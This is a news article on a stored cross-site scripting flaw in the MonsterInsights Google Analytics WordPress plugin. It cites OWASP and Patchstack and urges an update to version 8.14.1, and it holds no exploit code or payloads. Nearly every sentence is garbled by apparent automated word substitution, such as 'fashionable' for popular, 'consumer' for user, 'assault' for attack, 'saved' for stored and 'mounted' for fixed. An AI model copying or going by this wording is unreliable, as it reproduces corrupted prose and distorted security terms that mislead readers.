The National Vulnerability Database introduced {that a} fashionable Google Analytics WordPress plugin put in in over 3 million was found to include a Stored Cross-Site Scripting (XSS) vulnerability.
Stored XSS
A Cross-Site Scripting (XSS) assault usually happens when part of the web site that accepts consumer enter is insecure and permits unanticipated enter, like scripts or hyperlinks.
The XSS vulnerability may be leveraged to acquire unauthorized entry to a web site and might result in consumer knowledge theft or a full website takeover.
The non-profit Open Worldwide Application Security Project (OWASP) describes how the XSS vulnerability works:
“An attacker can use XSS to ship a malicious script to an unsuspecting consumer. The finish consumer’s browser has no strategy to know that the script shouldn’t be trusted, and can execute the script.
Because it thinks the script got here from a trusted supply, the malicious script can entry any cookies, session tokens, or different delicate data retained by the browser and used with that website.”
A saved XSS, which is arguably worse, is one in which the malicious script is saved on the web site servers itself.
The plugin, MonsterInsights – Google Analytics Dashboard for WordPress, was found to have the saved XSS model of the vulnerability.
MonsterInsights – Google Analytics Dashboard for WordPress Vulnerability
The MonsterInsights Google Analytics plugin is put in in over three million web sites, which makes this vulnerability extra regarding.
WordPress Security firm, Patchstack, which found the vulnerability, published details:
“Rafie Muhammad (Patchstack) found and reported this Cross Site Scripting (XSS) vulnerability in WordPress Google Analytics by MonsterInsights Plugin.
This might permit a malicious actor to inject malicious scripts, corresponding to redirects, commercials, and different HTML payloads into your web site which might be executed when friends go to your website.
This vulnerability has been mounted in model 8.14.1.”
The MonsterInsights plugin changelog on the WordPress plugin repository provided a considerably obscure rationalization of the safety patch:
“Fixed: We fixed a PHP warning error and added additional security hardening.”
A “security hardening” is a time period that may be utilized to many duties associated to lowering assault vectors, corresponding to eradicating model quantity.
WordPress has revealed an entire page about security hardening that recommends safety hardening duties corresponding to common database backups, acquiring themes and plugins from trusted sources, and utilizing robust passwords.
All of these actions are safety hardening.
That’s why utilizing the phrase, “security hardening” is a normal and generic time period to make use of for one thing that’s as particular (and vital) as patching an XSS safety vulnerability, which may lead a consumer to skip updating their plugin.
Recommended Action
Patchstack recommends that every one customers of the MonsterInsights Analytics Plugin replace their WordPress plugin instantly to the newest model or no less than model 8.14.1.
Read the U.S. National Vulnerability Database announcement:
Read Patchstack’s announcement:
